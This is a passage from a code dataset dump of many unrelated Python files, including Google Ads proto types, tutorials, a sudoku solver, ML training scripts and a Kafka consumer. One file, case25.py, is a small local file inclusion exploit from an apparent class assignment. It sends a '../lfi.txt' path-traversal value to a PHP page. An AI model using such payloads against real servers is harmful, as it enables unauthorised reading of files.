a collection of conversions or\n remarketing actions.\n\n Attributes:\n actions (MutableSequence[google.ads.googleads.v14.common.types.UserListActionInfo]):\n Actions associated with this user list.\n \"\"\"\n\n actions: MutableSequence[\"UserListActionInfo\"] = proto.RepeatedField(\n proto.MESSAGE,\n number=1,\n message=\"UserListActionInfo\",\n )\n\n\nclass UserListActionInfo(proto.Message):\n r\"\"\"Represents an action type used for building remarketing user\n lists.\n\n This message has `oneof`_ fields (mutually exclusive fields).\n For each oneof, at most one member field can be set at the same time.\n Setting any member of the oneof 
automatically clears all other\n members.\n\n .. _oneof: https://proto-plus-python.readthedocs.io/en/stable/fields.html#oneofs-mutually-exclusive-fields\n\n Attributes:\n conversion_action (str):\n A conversion action that's not generated from\n remarketing.\n\n This field is a member of `oneof`_ ``user_list_action``.\n remarketing_action (str):\n A remarketing action.\n\n This field is a member of `oneof`_ ``user_list_action``.\n \"\"\"\n\n conversion_action: str = proto.Field(\n proto.STRING,\n number=3,\n oneof=\"user_list_action\",\n )\n remarketing_action: str = proto.Field(\n proto.STRING,\n number=4,\n oneof=\"user_list_action\",\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","sub_path":"google/ads/googleads/v14/common/types/user_lists.py","file_name":"user_lists.py","file_ext":"py","file_size_in_byte":22081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"34557205","text":"# -*- coding: UTF-8 -*-\n\"\"\"Comprehensions\"\"\"\n\nprice_strings = [\"24\", \"13\", \"16000\", \"1400\"]\nprice_nums = [int(price) for price in price_strings]\n\nfish = \"halibut\"\n\n# Comprehensions give handles on each element of a collection\nletters = [letter for letter in fish]\n\nprint(f\"We iterate over a string, containing the world: '{fish}'\")\nprint(f\"This turns our string into a list: {letters}.\")\n\n# We can manipulate each element as we go\ncapital_letters = [letter.upper() for letter in letters]\n\nprint(f\"This capitalizes the letters in our list: {capital_letters}.\")\n\n# We can remove elements with a boolean test\nno_h = [letter for letter in letters if letter != \"h\"]\ndysfunctional_fish = \"\".join(no_h)\n\nno_h_or_b = [letter for letter in letters if letter != \"h\" and letter != \"b\"]\ndysfunctional_fish = \"\".join(no_h_or_b)\n\nprint(f\"And our filtered string is: {dysfunctional_fish}.\")\nprint(\"=\" * 72)\n\njune_temperatures = [72, 65, 59, 87]\njuly_temperatures = [87, 85, 92, 
79]\naugust_temperatures = [87, 77, 68, 72]\nsummer_temperatures = [june_temperatures, july_temperatures, august_temperatures]\n\n# We can use functions inside of list comprehensions\nlowest_summer_temperatures = [min(temps) for temps in summer_temperatures]\n\nprint(f\"The lowest temperature in June was: {lowest_summer_temperatures[0]}.\")\nprint(f\"The lowest temperature in July was: {lowest_summer_temperatures[1]}.\")\nprint(f\"The lowest temperature in August was: {lowest_summer_temperatures[-1]}.\")\n","sub_path":"03-Python/3/Activities/Solved/05-Ins_List_comprehensions/comprehensions.py","file_name":"comprehensions.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"243105392","text":"import time\nfrom kafka import KafkaConsumer, KafkaProducer\n\ndef sub(name):\n print(\"sub started\")\n consumer = KafkaConsumer('test', consumer_timeout_ms=7000)\n latency_list = []\n Append = latency_list.append\n\n for msg in consumer:\n # print(f\"Reader {name} arrived time {time.time()} and departure time {msg.timestamp}\")\n # print(\"msg arrived\")\n\n latency = time.time() - float(msg.value)\n print(latency)\n Append(latency)\n print(msg.value)\n\n print(\"latency average:\", sum(latency_list) / len(latency_list))\n\nif __name__ == '__main__':\n\n sub(\"reader1\")","sub_path":"kafka/kafka_sub_latency.py","file_name":"kafka_sub_latency.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"195082988","text":"import requests\nimport webbrowser\n\n# Exploit: change the LANG to ../lfi.txt.php and server will write file contents\n# to the webpage\n# Local File Inclusion\n\ndef main():\n temp = '/tmp/case25.html'\n payload = {'LANG':'../lfi.txt'}\n\n r = requests.post('http://wsb.com/Assignment2/case25.php', data=payload)\n with open(temp, 'wb') as f:\n f.write(r.content)\n 
webbrowser.open(temp, 2)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"case25.py","file_name":"case25.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"124896335","text":"from copy import deepcopy\n\n\ndef getCons( board , i , j ):\n\n masks = [True] * 10\n\n #horizontal\n for k in range(9):\n masks[ board[i][k] ] = False\n\n #vertical\n for k in range(9):\n masks[ board[k][j] ] = False\n\n istart = (i//3)*3\n jstart = (j//3)*3\n for k1 in range(istart,istart+3):\n for k2 in range(jstart,jstart+3):\n masks[ board[k1][k2] ] = False\n \n res = []\n for i in range(1,10):\n if masks[i]:\n res.append(i)\n return res\n\n\ndef solve( board , deepness = 0 ):\n\n res = deepcopy(board)\n while True:\n signal = explore( res )\n \n if signal == -1:\n return None\n elif signal == 0:\n break\n\n if not completeBoard(res):\n\n i,j = leastTrackbackPosition(res)\n possibleList = getCons(res,i,j)\n \n for x in possibleList:\n #print(\"Deepness:\",deepness,\"try\",x,\"in\",possibleList)\n res[i][j] = x\n \n deepres = solve( res , deepness + 1 )\n if deepres != None:\n #print(\"Deepness:\",deepness,\" Got solution!!!\")\n #printBoard(deepres)\n #print(\"return True in deepness\",deepness)\n return deepres\n\n #print(\"Deepness:\",deepness,\" Failed!!!\")\n return None\n\n else:\n #print(\"complete!!\")\n return res\n\n\ndef leastTrackbackPosition( board ):\n resi , resj = 0 , 0\n minNum = 9\n for i in range(9):\n for j in range(9):\n if board[i][j] == 0:\n tMinNum = len(getCons( board , i , j ))\n if tMinNum == 2:\n return i,j\n elif tMinNum < minNum:\n minNum = tMinNum\n resi,resj = i,j\n return resi,resj\n\n\ndef explore( board ):\n\n # 0 - no more unity solution\n # 1 - could explore more\n # -1 - no solution\n resCode = 0\n for i in range(9):\n for j in range(9):\n if board[i][j] == 0:\n\n #print(\"explore\",i,j)\n possibleList = getCons( board , i , j )\n if 
len(possibleList) == 1:\n board[i][j] = possibleList[0]\n resCode = 1\n elif len(possibleList) == 0:\n return -1\n \n return resCode\n\n\ndef completeBoard(board):\n for i in range(9):\n for j in range(9):\n if board[i][j] == 0:\n return False\n return True\n\n\ndef printBoard(board,debug=True):\n for i in range(9):\n print( \"\".join([str(x) for x in board[i]]) )\n if debug:\n print(\"=================\")\n\n \nif __name__ == \"__main__\":\n\n numBoard = []\n for _ in range(9):\n numBoard.append( [int(x) for x in input().strip()] )\n numBoard = solve( numBoard )\n printBoard( numBoard , debug = False )\n\n\n","sub_path":"ProjectEulerPlus/096-Sudoku_20150904.py","file_name":"096-Sudoku_20150904.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"594463498","text":"import torch\nfrom classifiers.standard.classifier import Classifier\nfrom classifiers.standard.bert_head import BertMeanPooling\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\nfrom transformers import BertPreTrainedModel, BertModel\n\n\nclass BertMeanPoolClassifier(Classifier):\n def __init__(self, config):\n self.config = config\n self.model = BertModelMeanPooling.from_pretrained(self.config['pretrained_model'])\n\n self.optimizer = torch.optim.Adam(self.model.parameters(), self.config['learning_rate'])\n\n # here, we can do some layer removal if we want to\n self.epochs = 0\n\n print(self.model)\n\n##\n# In this model,\n# we take the final hidden state of all tokens apart from CLS and SEP.\n# And pool that.\n# To make it simple, we take the BertModel, and replace the Pooler with our own.\n##\n\n\nclass BertModelMeanPooling(BertPreTrainedModel):\n def __init__(self, config):\n super(BertModelMeanPooling, self).__init__(config)\n self.num_labels = config.num_labels\n\n self.bert = BertModel(config)\n\n # remove the pooling layer and replace with our own\n self.bert.pooler = 
BertMeanPooling(config)\n\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(config.hidden_size, self.config.num_labels)\n self.head = nn.Softmax(dim=1)\n self.init_weights()\n\n def forward(self, input_ids=None, attention_mask=None, token_type_ids=None,\n position_ids=None, head_mask=None, inputs_embeds=None, labels=None):\n\n outputs = self.bert(input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds)\n\n pooled_output = outputs[1]\n\n pooled_output = self.dropout(pooled_output)\n logits = self.classifier(pooled_output)\n logits = self.head(logits)\n outputs = (logits,) + outputs[2:] # add hidden states and attention if they are here\n\n if labels is not None:\n\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\n\n outputs = (loss,) + outputs\n\n return outputs # (loss), logits, (hidden_states), (attentions)","sub_path":"medicalbert/classifiers/standard/bert_mean_pool_classifier.py","file_name":"bert_mean_pool_classifier.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"449706852","text":"class Solution(object):\n def reverseWords(self, s):\n if not s:\n return \"\"\n arr = s.split(\" \")\n sb = \"\"\n for i in range(len(arr) - 1, -1, -1):\n if arr[i] != \"\":\n sb += arr[i]\n sb += \" \"\n return sb[: -1]\n","sub_path":"151/151.reverse-words-in-a-string.695940600.Accepted.leetcode.python3.py","file_name":"151.reverse-words-in-a-string.695940600.Accepted.leetcode.python3.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"365852373","text":"# 2021 카카오 채용연계형 인턴십 - 표 편집\n# heapq 라이브러리 사용해서 효율성 해결\nimport heapq\n\ndef solution(n, k, cmd):\n # 현재 위치:right heap의 첫 번째 원소\n\n left, right, 
delete = [], [], []\n # 왼쪽은 최대값이 맨 앞에 위치하도록, 오른쪽은 최솟값이 맨 앞에 위치하도록 heap을 구성한다.\n for i in range(n):\n heapq.heappush(right, i)\n for i in range(k):\n heapq.heappush(left, -heapq.heappop(right))\n\n for c in cmd:\n # U or D인 경우\n if len(c) > 1:\n move = int(c.split()[-1])\n # D(아래로)인 경우\n if c.startswith(\"D\"):\n for _ in range(move):\n # 오른쪽 heap에서 왼쪽 heap으로 값을 이동시킨다.\n if right:\n heapq.heappush(left, -heapq.heappop(right))\n\n # U(위로)인 경우\n elif c.startswith(\"U\"):\n for _ in range(move):\n # 왼쪽 heap에서 오른쪽 heap으로 값을 이동시킨다.\n heapq.heappush(right, -heapq.heappop(left))\n elif c == \"C\":\n # 값을 삭제하되, 가장 최근에 삭제된 값을 복구하기 쉽도록 stack 형태를 사용한다\n delete.append(heapq.heappop(right))\n\n # 삭제된 행이 가장 마지막 행인 경우 바로 윗 행을 선택하도록 한다.\n if not right:\n heapq.heappush(right, -heapq.heappop(left))\n elif c == \"Z\":\n # 삭제한 값 복구하기\n repair = delete.pop()\n\n # 현재 위치보다 값이 작을 경우 left에 넣는다\n if repair < right[0]:\n heapq.heappush(left, -repair)\n else:\n heapq.heappush(right, repair)\n result = []\n while left:\n result.append(-heapq.heappop(left))\n while right:\n result.append(heapq.heappop(right))\n result = set(result)\n answer = [\"O\" if i in result else \"X\" for i in range(n)]\n\n return \"\".join(answer)\n","sub_path":"Kakao/표 편집.py","file_name":"표 편집.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"434835336","text":"#!/usr/bin/python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl # https://stackoverflow.com/questions/23309272/matplotlib-log-transform-counts-in-hist2d\nimport sys\nimport random as rd\n\n\nr_ROI = float(sys.argv[1])\nD0 = float(sys.argv[2])\nD1 = float(sys.argv[3])\ndphi = float(sys.argv[4]) * np.pi / 180.\n\nN_ROI = int(sys.argv[5])\nN_arc = int(sys.argv[6])\n\np_ROI_x = np.zeros(N_ROI)\np_ROI_y = np.zeros(N_ROI)\np_arc_x = np.zeros(N_arc)\np_arc_y = np.zeros(N_arc)\n\n\nfor i in range(0, N_ROI):\n\tr = rd.uniform(0., 
r_ROI)\n\tphi = rd.uniform(0., 2.*np.pi)\n\n\tp_ROI_x[i] = r * np.cos(phi)\n\tp_ROI_y[i] = r * np.sin(phi)\n\n\nfor i in range(0, N_arc):\n\tr = rd.uniform(D0, D1)\n\tphi = rd.uniform(0., dphi)\n\n\tp_arc_x[i] = r * np.cos(phi)\n\tp_arc_y[i] = r * np.sin(phi)\n\n# compute all mutual distances\n\nd_array = np.zeros(N_ROI * N_arc)\nang_array = np.zeros(N_ROI * N_arc)\n\nfor i in range(0, N_ROI):\n\t\n\tfor j in range(0, N_arc):\n\t\tx = p_ROI_x[i] - p_arc_x[j]\n\t\ty = p_ROI_y[i] - p_arc_y[j]\n\n\t\tidx = j + i*N_arc\n\n\t\td = np.sqrt( x**2 + y**2 )\n\t\td_array[idx] = d\n\n\t\tang = np.abs((np.mod(np.arctan2(y, x) + 2*np.pi, 2*np.pi) - dphi/2.)*180./np.pi - 180.)\n\t\tang_array[idx] = ang\n\n\t\t#print(d, np.mod(ang + 2.*np.pi, 2*np.pi))\n\n#ang_array = ang_array*180./np.pi - 180.\n\nx_bins = np.linspace(np.min(d_array), np.max(d_array), 50) \ny_bins = np.linspace(np.min(ang_array), np.max(ang_array), 50)\n\nplt.hist2d(d_array, ang_array, bins =[x_bins, y_bins], norm=mpl.colors.LogNorm())\nplt.figure()\nplt.hist(d_array)\nplt.figure()\nplt.hist(ang_array)\nplt.show()","sub_path":"LunarEjectaCode/distance_distribution_test.py","file_name":"distance_distribution_test.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"364381886","text":"\"\"\"\nUse this code as a guide for extracting a dataset of CQFT features.\n\"\"\"\nimport bregman\nfrom scipy import io\nimport numpy as np\n\nclass Batch():\n def __init__(self, data_dir=None):\n self.data_dir = data_dir\n if self.data_dir is None:\n self.data_dir = '/global/data/casey/sarroff/projects/hamr/data'\n\n def cqft(self, runid, ncores, debug=False):\n allsongs = np.load(self.data_dir+'/filt_allsongs.npy').item()\n l = len(allsongs)\n if debug:\n l = ncores * 3\n v = allsongs.values()\n alt_dir = '/global/data/casey/sarroff/projects/groove/data'\n for i in range(runid, l, ncores):\n wav_f = 
alt_dir+'/audio/wav/'+str(v[i].id)+'.wav'\n # read wav file\n #beats = v[i].beat4.T[0]\n print(\"\\t{0}\\t{1}\".format(float(i)/l, wav_f))\n x = bregman.sound.WavOpen(wav_f, 6*22050).sig[22050:]\n p = bregman.features.Features().default_feature_params()\n p['hi'] = 10000\n p['nfft'] = 2048\n p['nhop'] = 1024\n p['sample_rate'] = 22050\n p['wfft'] = 2048\n F = bregman.features.Features(x, p)\n data_file = ('/scratch/sarroff/{0}/'.format(runid)+\n v[i].id+'.cqft.npz')\n np.savez(data_file, CQFT=F.CQFT, POWER=F.POWER, Q=F.Q,\n STFT=F.STFT, feature_params=F.feature_params)\n\ndef collect(data_base='../data'):\n allkeys = np.load(data_base+'/allkeys.npy')\n tmp = np.load(data_base+'/cqft/'+allkeys[0]+'.cqft.npz')['CQFT'].shape\n allcqft = np.empty((len(allkeys), tmp[0]*tmp[1]))\n for i,k in enumerate(allkeys):\n print(float(i)/len(allkeys))\n allcqft[i] = np.load(data_base+'/cqft/'+allkeys[i]+'.cqft.npz'\n )['CQFT'].flatten()\n return allcqft\n\nif __name__ == \"__main__\":\n \"\"\"\n Main function for batch extracting features.\n \"\"\"\n import sys\n B = Batch()\n if sys.argv[1] == \"cqft\":\n runid = int(sys.argv[2])\n ncores = int(sys.argv[3])\n print(\"Extracting cqft... 
runid={0}, ncores={1}\".format(\n runid, ncores))\n if len(sys.argv) == 5 and sys.argv[4] == \"True\":\n print(\"Debug on\")\n debug = True\n else:\n debug = False\n B.cqft(runid, ncores, debug)\n","sub_path":"deepAEFeatures.py","file_name":"deepAEFeatures.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"286503892","text":"import tensorflow as tf\nimport tfcoreml as tf_converter\nfrom coremltools.proto import NeuralNetwork_pb2\n\ntf.app.flags.DEFINE_string(\n 'input_pb_file',\n '/home/corp.owlii.com/yi.xu/workspace/sgmt/train/deploy/deploy_graph.pb',\n 'Input tensorflow pb file')\n\ntf.app.flags.DEFINE_string(\n 'output_mlmodel',\n '/home/corp.owlii.com/yi.xu/workspace/sgmt/train/deploy/deploy_graph.mlmodel',\n 'Output coreml model file')\n\ntf.app.flags.DEFINE_integer(\n 'stage', 1, 'stage of model to be transformed')\n\nFLAGS = tf.app.flags.FLAGS\n\nif FLAGS.stage == 1:\n input_sizes = [[1, 600, 600, 3]]\n input_node_names = ['resize_images/ResizeBilinear:0']\n output_node_names = ['concat:0', 'Softmax:0', 'FirstStageFeatureExtractor/MobilenetV2/expanded_conv_16/output:0']\nelif FLAGS.stage == 2:\n input_sizes = [[1, 14, 14, 320]]\n input_node_names = ['CropAndResize:0']\n output_node_names = ['class_scores:0', 'refined_box_encodings:0']\n\ndef main(unused_argv):\n if FLAGS.stage == 1:\n tf_converter.convert(tf_model_path = FLAGS.input_pb_file,\n mlmodel_path = FLAGS.output_mlmodel,\n image_input_names = input_node_names[0],\n output_feature_names = output_node_names,\n input_name_shape_dict = {input_node_name: input_size \n for input_node_name, input_size in zip(input_node_names, input_sizes)})\n else:\n tf_converter.convert(tf_model_path = FLAGS.input_pb_file,\n mlmodel_path = FLAGS.output_mlmodel,\n output_feature_names = output_node_names,\n input_name_shape_dict = {input_node_name: input_size \n for input_node_name, input_size in zip(input_node_names, 
input_sizes)})\n\n\nif __name__ == '__main__':\n tf.app.run()\n\n\n","sub_path":"workspace/det/tf_coreml_utils/frcnn_tf2coreml_zcr/tf-coreml/tf2coreml.py","file_name":"tf2coreml.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"548598174","text":"################\r\n\r\n\r\n#Prithvi Shetty\r\n#Written in Python 3.6\r\n\r\n\r\nclass Problem:\r\n\r\n #To limit infinite negative possibilities\r\n def negative(self):\r\n return(self<0)\r\n \r\n #To limit infinite positive possibilities\r\n def positive(self):\r\n return(self>3)\r\n \r\n #To create all the possible tree branches\r\n def branch(self):\r\n np=[]\r\n \r\n \r\n #All the possible actionable outcomes\r\n #1st number in the tuple indicates number of cannibals on the left bank\r\n #2nd number in the tuple indicates number of missionaries on the right bank\r\n #3rd number in the tuple indicates position of boat\r\n #1 indicates left bank and 2 indicates right bank\r\n \r\n state1=(1, 0, 1)\r\n state2=(2, 0, 1)\r\n state3=(0, 1, 1)\r\n state4=(0, 2, 1)\r\n state5=(1, 1, 1)\r\n\r\n for i in (state1,state2,state3,state4,state5):\r\n #If position of boat is left bank, this lists out all the possible outcomes\r\n if self[2]==1:\r\n branch = [a - b for a, b in zip(self, i)] #Subtracts the current state with the possible state\r\n branch = tuple(branch)\r\n if any(Problem.negative(x) for x in branch): #Checks the negative limit\r\n continue\r\n\r\n else:\r\n np.append(branch)\r\n #If position of boat is right bank, this lists out of all the possible outcomes\r\n else:\r\n branch = [a + b for a, b in zip(self, i)] #Adds the current state with the possible state\r\n branch = tuple(branch)\r\n if any(Problem.positive(x) for x in branch): #Checks the positive limit\r\n continue\r\n\r\n else: \r\n np.append(branch)\r\n\r\n\r\n return np\r\n \r\n #This function checks if the state is dead (i.e. 
when the number of cannibals exceeds the number of missionaries)\r\n def dead(self):\r\n return (self[1]>self[0] and self[0]!=0) or (3-self[0]< 3-self[1] and 3-self[0]!=0)\r\n \r\n #This function checks if the state has reached the goal state which is (0,0,0)\r\n def goal(self):\r\n return(self==(0, 0, 0))\r\n\r\n \r\n #This function searches the tree with Blind Depth for search\r\n def blind_dfs(self,queue,dictionary):\r\n\r\n #Checks if goal state is reached, it prints out the path and appends to a dictionary under 'all states'\r\n if Problem.goal(self):\r\n queue.append(self)\r\n print (\"Solution:\")\r\n for q in queue:\r\n print (q)\r\n \r\n dictionary['all_states'] += 1\r\n queue.pop()\r\n \r\n #Checks if state is dead and appends to a dictionary under dead states\r\n #Also appends under ' all states'\r\n elif Problem.dead(self):\r\n dictionary['dead_states'] +=1\r\n dictionary['all_states'] += 1\r\n\r\n #Checks if state is repeated again and appends to a dictionary under repeated states\r\n elif (self in queue):\r\n dictionary['repeated_states']+=1\r\n dictionary['all_states'] += 1\r\n \r\n #If valid, then further search deepens\r\n \r\n else :\r\n queue.append(self)\r\n dictionary['all_states']+=1\r\n next = Problem.branch(self)\r\n for i in next:\r\n Problem.blind_dfs(i,queue,dictionary)\r\n \r\n queue.pop()\r\n\r\n\r\n def run(self):\r\n \r\n #Initialize an empty dictionary to maintain a count of the three states (all states, dead states and repeated states)\r\n dictionary = {}\r\n (dictionary['dead_states'], dictionary['all_states'], dictionary['repeated_states']) = (0,0,0)\r\n \r\n #Queue to track the path\r\n queue = []\r\n \r\n #Initializer\r\n Problem.blind_dfs((3,3,1),queue,dictionary)\r\n print (\"totals\", dictionary['all_states'] - dictionary['dead_states'] - dictionary['repeated_states'], end=' ')\r\n print (\"illegals\", dictionary['dead_states'], end= ' ')\r\n print(\"repeats\", dictionary['repeated_states'], end= ' ')\r\n 
\r\n#Implementation\r\na=Problem()\r\na.run()\r\n\r\n\r\n####################\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"651711205","text":"#!/usr/bin/env python3\n\n\ndef files1():\n fhand = open('mbox-short.txt')\n\n \"\"\"\n count = 0\n for line in fhand:\n count = count + 1\n\n print('Line Count:', count)\n \"\"\"\n\n inp = fhand.read()\n print(len(inp))\n print(inp[:20])\n\n\ndef files2():\n fhand = open('mbox-short.txt')\n for line in fhand:\n line = line.rstrip()\n if line.startswith('From:') :\n print(line)\n\n\ndef files3():\n fhand = open('mbox-short.txt')\n for line in fhand:\n line = line.rstrip()\n if line.find('@uct.ac.za') == -1 :\n continue\n print(line)\n\ndef files4():\n fname = input('Enter the file name: ')\n try:\n fhand = open(fname)\n except:\n print('File cannot be opened:', fname)\n exit()\n\n count = 0\n for line in fhand:\n if line.startswith('Subject:') :\n count = count + 1\n\n print('There were', count, 'subject lines in', fname)\n\n\ndef files5():\n fout = open('output.txt', 'w')\n line1 = \"This here's the wattle,\\n\"\n fout.write(line1)\n fout.close()\n\n\nif __name__ == '__main__':\n #files1()\n #files2()\n #files3()\n #files4()\n files5()\n","sub_path":"chapter7.py","file_name":"chapter7.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"596166708","text":"from __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\nimport argparse\r\nimport sys\r\nimport math\r\nimport numpy as np\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport tensorflow as tf\r\nFLAGS = None\r\n \r\ndef train():\r\n\tf = open('acc.txt', 'w')\r\n\t# Import data\r\n\tmnist = 
input_data.read_data_sets(FLAGS.data_dir,one_hot=True,fake_data=FLAGS.FakeData)\r\n\tsess = tf.InteractiveSession()\r\n\tdef weight_variable(shape):\r\n\t\tinitial = tf.truncated_normal(shape, stddev=0.1)\r\n\t\treturn tf.Variable(initial)\r\n\r\n\tdef bias_variable(shape):\r\n\t\tinitial = tf.constant(0.1, shape=shape)\r\n\t\treturn tf.Variable(initial)\r\n\t\t\t\r\n\tdef conv2d(x, W, strides=[1, 1, 1, 1]):\r\n\t\treturn tf.nn.conv2d(x, W, strides, padding='SAME')\r\n\r\n\tdef max_pool_2x2(x):\r\n\t\treturn tf.nn.max_pool(x, ksize=[1, 2, 2, 1],strides=[1, 2, 2, 1], padding='SAME')\r\n\r\n\tdef feed_dict(train,LR):\r\n\t\tif train or FLAGS.FakeData:\r\n\t\t\txs, ys = mnist.train.next_batch(100, fake_data=FLAGS.FakeData)\r\n\t\t\tk = FLAGS.dropout\r\n\t\telse:\r\n\t\t\txs, ys = mnist.test.images, mnist.test.labels\r\n\t\t\tk = 1.0\r\n\t\treturn {x: xs, y_: ys, keep_prob: k, lr: LR}\r\n\t\r\n\t# Input placeholders\r\n\tx = tf.placeholder(tf.float32, shape=[None, 784])\r\n\ty_ = tf.placeholder(tf.float32, shape=[None, 10])\r\n\tlr = tf.placeholder(tf.float32)\r\n\tW = tf.Variable(tf.zeros([784,10]))\r\n\tb = tf.Variable(tf.zeros([10]))\r\n\tsess.run(tf.initialize_all_variables())\r\n\ty = tf.nn.softmax(tf.matmul(x,W) + b)\r\n\tx_image = tf.reshape(x, [-1,28,28,1])\r\n\tkeep_prob = tf.placeholder(tf.float32)\r\n\t\r\n\t# First convolutional layer - maps one grayscale image to 32 feature maps.\r\n\tW1 = tf.Variable(tf.truncated_normal([6, 6, 1, 6], stddev=0.1))\r\n\tB1 = tf.Variable(tf.constant(0.1, tf.float32, [6]))\r\n\t\r\n\tW2 = tf.Variable(tf.truncated_normal([6, 6, 6, 12], stddev=0.1))\r\n\tB2 = tf.Variable(tf.constant(0.1, tf.float32, [12]))\r\n\t\r\n\tW3 = tf.Variable(tf.truncated_normal([4, 4, 12, 24], stddev=0.1))\r\n\tB3 = tf.Variable(tf.constant(0.1, tf.float32, [24]))\r\n\r\n\tW4 = tf.Variable(tf.truncated_normal([7 * 7 * 24, 200], stddev=0.1))\r\n\tB4 = tf.Variable(tf.constant(0.1, tf.float32, [200]))\r\n\t\r\n\tW5 = tf.Variable(tf.truncated_normal([200, 
10], stddev=0.1))\r\n\tB5 = tf.Variable(tf.constant(0.1, tf.float32, [10]))\r\n\t\r\n\t#stride = 1 # output is 28x28\r\n\tY1 = tf.nn.relu(tf.nn.conv2d(x_image, W1, strides=[1, 1, 1, 1], padding='SAME') + B1)\r\n\t#stride = 2 # output is 14x14\r\n\tY2 = tf.nn.relu(tf.nn.conv2d(Y1, W2, strides=[1, 2, 2, 1], padding='SAME') + B2)\r\n\t#stride = 2 # output is 7x7\r\n\tY3 = tf.nn.relu(tf.nn.conv2d(Y2, W3, strides=[1, 2, 2, 1], padding='SAME') + B3)\r\n\tYY = tf.reshape(Y3, shape=[-1, 7 * 7 * 24])\r\n\t\r\n\tY4 = tf.nn.relu(tf.matmul(YY, W4) + B4)\r\n\tYY4 = tf.nn.dropout(Y4, keep_prob)\r\n\tYlogits = tf.matmul(YY4, W5) + B5\r\n\ty_conv = tf.nn.softmax(Ylogits)\r\n\t\r\n\tcross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=Ylogits, labels=y_)\r\n\tcross_entropy = tf.reduce_mean(cross_entropy)*100\r\n\ttrain_step = tf.train.AdamOptimizer(lr).minimize(cross_entropy)\r\n\tcorrect_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))\r\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\ttf.summary.scalar('cross entropy', cross_entropy)\r\n\ttf.summary.scalar('accuracy', accuracy)\r\n\t\r\n\r\n # Merge all the summaries and write them out to\r\n # /tmp/tensorflow/mnist/logs/mnist_with_summaries (by default)\r\n\tmerged = tf.summary.merge_all()\r\n\ttrain_writer = tf.summary.FileWriter(FLAGS.log_dir + '/train', sess.graph)\r\n\ttest_writer = tf.summary.FileWriter(FLAGS.log_dir + '/test')\r\n\ttf.global_variables_initializer().run()\r\n\ttr_acc_list = []\r\n\ttrain_d = np.zeros((784))\r\n\ttest_d = np.zeros((10))\r\n\tfor i in range(FLAGS.max_step):\r\n\t\tmax_learning_rate = 0.003\r\n\t\tmin_learning_rate = 0.0001\r\n\t\tdecay_speed = 2000.0\r\n\t\tlearning_rate = min_learning_rate + (max_learning_rate - min_learning_rate) * math.exp(-i/decay_speed)\r\n\t\t\r\n\t\tif i % 100 == 0:\r\n\t\t\tsummary, acc = sess.run([merged, accuracy], feed_dict=feed_dict(False,learning_rate))\r\n\t\t\ttest_writer.add_summary(summary, i)\r\n\t\t\tif i != 
0:\r\n\t\t\t\ts,tr_acc = sess.run([merged,accuracy],feed_dict={x:train_d[1:,],y_:test_d[1:,],keep_prob: 1.0})\r\n\t\t\t\tf.write('Step: %s Train Accuracy: %s Test Accuracy: %s\\n' % (i, tr_acc, acc))\r\n\t\t\t\tprint('Step: %s Train Accuracy: %s Test Accuracy: %s' % (i, tr_acc, acc))\r\n\t\t\t\ttr_acc_list.append(acc)\r\n\t\t\telse:\r\n\t\t\t\tf.write('Step: %s Test Accuracy: %s\\n' % (i, acc))\r\n\t\t\t\tprint('Step: %s Test Accuracy: %s' % (i, acc))\r\n\t\t\ttrain_d = np.zeros((784))\r\n\t\t\ttest_d = np.zeros((10))\r\n\t\telse: \r\n\t\t\tfd_train = feed_dict(True,learning_rate)\r\n\t\t\tsummary, _ = sess.run([merged, train_step], feed_dict=fd_train)\r\n\t\t\ttrain_writer.add_summary(summary, i)\r\n\t\t\ttrain_d = np.vstack((train_d,list(fd_train.values())[0]))\r\n\t\t\ttest_d = np.vstack((test_d,list(fd_train.values())[1]))\r\n\tf.write('\\n Average test accuracy: %s' % (np.mean(tr_acc_list)))\r\n\tf.write('\\n Max test accuracy: %s' % (np.amax(tr_acc_list)))\r\n\tf.close()\r\n\r\ndef main(_):\r\n\tif 